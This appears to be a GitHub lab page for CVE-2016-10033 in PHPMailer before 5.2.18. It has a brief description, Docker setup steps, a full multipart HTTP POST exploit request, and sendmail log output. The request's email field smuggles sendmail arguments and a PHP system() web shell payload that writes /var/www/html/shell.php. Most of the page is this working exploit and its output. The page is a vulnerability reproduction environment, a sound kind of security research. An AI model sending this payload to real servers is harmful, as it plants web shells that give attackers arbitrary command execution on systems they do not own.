Skip to content

Latest commit

 

History

History

CVE-2016-10033

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
Dockerfile
Dockerfile
 
 
README.md
README.md
 
 
docker-compose.yml
docker-compose.yml
 
 
poc.sh
poc.sh
 
 
xdebug.ini
xdebug.ini
 
 

README.md

PHPMailer < 5.2.18 Remote Code Execution Vulnerability(CVE-2016-10033)

Introduction

The mailSend function in the isMail transport in PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a crafted Sender property. The key reason is the validateAddress be bypassed and the parameters has not been escapte truely.

Usage

Run

docker-compose up

Send the request to http://localhost:8080/poc.php or use the poc of opsxcq

POST /poc.php HTTP/1.1
Host: 10.128.154.152:8080
Content-Length: 510
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.128.154.152:8080
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzkrsSDcWISQlIkAI
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.128.154.152:8080/poc.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryzkrsSDcWISQlIkAI
Content-Disposition: form-data; name="action"

submit
------WebKitFormBoundaryzkrsSDcWISQlIkAI
Content-Disposition: form-data; name="name"

sdf
------WebKitFormBoundaryzkrsSDcWISQlIkAI
Content-Disposition: form-data; name="email"

"<?system($_GET['x']);?>". -OQueueDirectory=/tmp/. -X/var/www/html/shell.php @a.com
------WebKitFormBoundaryzkrsSDcWISQlIkAI
Content-Disposition: form-data; name="message"

sadf
------WebKitFormBoundaryzkrsSDcWISQlIkAI--

a shell.php with below content will be created on /var/www/html

...
00167 >>> Content-Type: message/rfc822
00167 >>> 
00167 >>> Return-Path: <\<\?system\($_GET\[\'x\'\]\)\;\?\>.>
00167 >>> Received: (from www-data@localhost)
00167 >>> 	by 72799d950c3c (8.15.2/8.15.2/Submit) id 2366KMQh000167
00167 >>> 	for @a.com; Wed, 6 Apr 2022 06:20:22 GMT
00167 >>> X-Authentication-Warning: 72799d950c3c: www-data set sender to \<\?system\($_GET\[\'x\'\]\)\;\?\>. using -f
00167 >>> X-Authentication-Warning: 72799d950c3c: Processed from queue /tmp/.
00167 >>> To: attacker <[email protected]>
00167 >>> Subject: subject
00167 >>> Date: Wed, 6 Apr 2022 06:18:22 +0000
00167 >>> From: Vuln Server <"<?system($_GET['x']);?>".-OQueueDirectory=/tmp/.-X/var/www/html/[email protected]>
00167 >>> Message-ID: <[email protected]>
00167 >>> X-Mailer: PHPMailer 5.2.17 (https://github.com/PHPMailer/PHPMailer)
00167 >>> MIME-Version: 1.0
00167 >>> Content-Type: multipart/alternative;
00167 >>> 	boundary="b1_89080c2ed839d99c55a8b6550eac7aaa"
00167 >>> Content-Transfer-Encoding: 8bit
...

Reference

https://github.com/opsxcq/exploit-CVE-2016-10033